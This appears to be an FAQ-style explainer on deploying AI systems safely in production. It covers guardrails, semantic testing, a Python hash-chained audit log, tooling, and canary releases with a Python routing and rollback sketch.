Traditional model deployment focuses on serving a single model behind an API. Modern AI deployment involves a multi‑layer stack: instructions, engines, context, retrieval, agents, and policies. Failures are more likely to be silent regressions or unsafe behaviors than obvious crashes, which is why you need semantic testing, guardrails, and release orchestration.
How do you deploy AI safely in production?
Safe AI deployment starts with treating prompts and configurations as code, embedding guardrails at input, output, and action levels, and using semantic evaluation and progressive rollout strategies. It also requires immutable logging and audit trails so you can trace decisions back to specific versions of your AI stack. Combining CI for semantic tests with CD for orchestrated releases is the practical path to safety.
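One way to approximate the audit trail described here is a hash-chained log, sketched below. Each entry records which versions of the stack produced a decision and includes the hash of the previous entry, so later edits are detectable. This makes the log tamper-evident rather than truly immutable, and the field names and version strings are hypothetical.

```python
import hashlib
import json

GENESIS_HASH = "0" * 64  # placeholder "previous hash" for the first entry


def _hash_body(body: dict) -> str:
    """Hash an entry's contents in a stable, key-sorted JSON form."""
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode("utf-8")).hexdigest()


def append_entry(log: list[dict], stack_versions: dict, decision: str) -> dict:
    """Append a record that links back to the previous entry's hash."""
    prev_hash = log[-1]["hash"] if log else GENESIS_HASH
    body = {"prev_hash": prev_hash, "stack_versions": stack_versions, "decision": decision}
    entry = {**body, "hash": _hash_body(body)}
    log.append(entry)
    return entry


def verify(log: list[dict]) -> bool:
    """Check that no entry was altered and that the chain is unbroken."""
    prev_hash = GENESIS_HASH
    for entry in log:
        body = {key: value for key, value in entry.items() if key != "hash"}
        if entry["prev_hash"] != prev_hash or entry["hash"] != _hash_body(body):
            return False
        prev_hash = entry["hash"]
    return True


audit_log: list[dict] = []
append_entry(audit_log, {"prompt": "a1b2c3", "model": "model-v1"}, "refund approved")
append_entry(audit_log, {"prompt": "d4e5f6", "model": "model-v1"}, "refund denied")
```

With records like these, "why did the system do that?" becomes a lookup: the entry names the prompt and model versions that were live when the decision was made.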
What tools are used for AI deployment?
Teams typically use a mix of LLM providers or model‑serving platforms, vector databases, observability tools, and CI/CD systems for orchestrating releases. On top of that, they add policy engines and specialized evaluation frameworks. The critical shift is moving from isolated "AI tools" to integrated pipelines that tie everything together.
How do canary releases work for AI models and prompts?
With canary releases, you send a small portion of traffic to the new behavior (a new model, prompt, or RAG strategy) while most users continue on the old path. You observe semantic quality, safety signals, and performance. If the canary behaves well, you gradually increase its share. If it misbehaves, you automatically roll back to the previous version.
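The mechanics can be sketched in a few lines of Python. This is an illustration under stated assumptions, not a description of any particular platform: the rollout steps are hypothetical, and the `healthy` flag stands in for whatever quality, safety, and performance checks you run on the canary.

```python
import hashlib

ROLLOUT_STEPS = (5, 25, 50, 100)  # hypothetical canary percentages


def route(user_id: str, canary_percent: int) -> str:
    """Deterministically assign a user to the canary or the stable version."""
    bucket = int(hashlib.sha256(user_id.encode("utf-8")).hexdigest(), 16) % 100
    return "canary" if bucket < canary_percent else "stable"


def next_percent(current: int, healthy: bool) -> int:
    """Advance to the next rollout step, or drop to 0 (roll back) if unhealthy."""
    if not healthy:
        return 0
    for step in ROLLOUT_STEPS:
        if step > current:
            return step
    return 100
```

Hashing the user ID keeps each user on the same path between requests, and because the bucket never changes, anyone in the canary at 5% stays in it as the share grows.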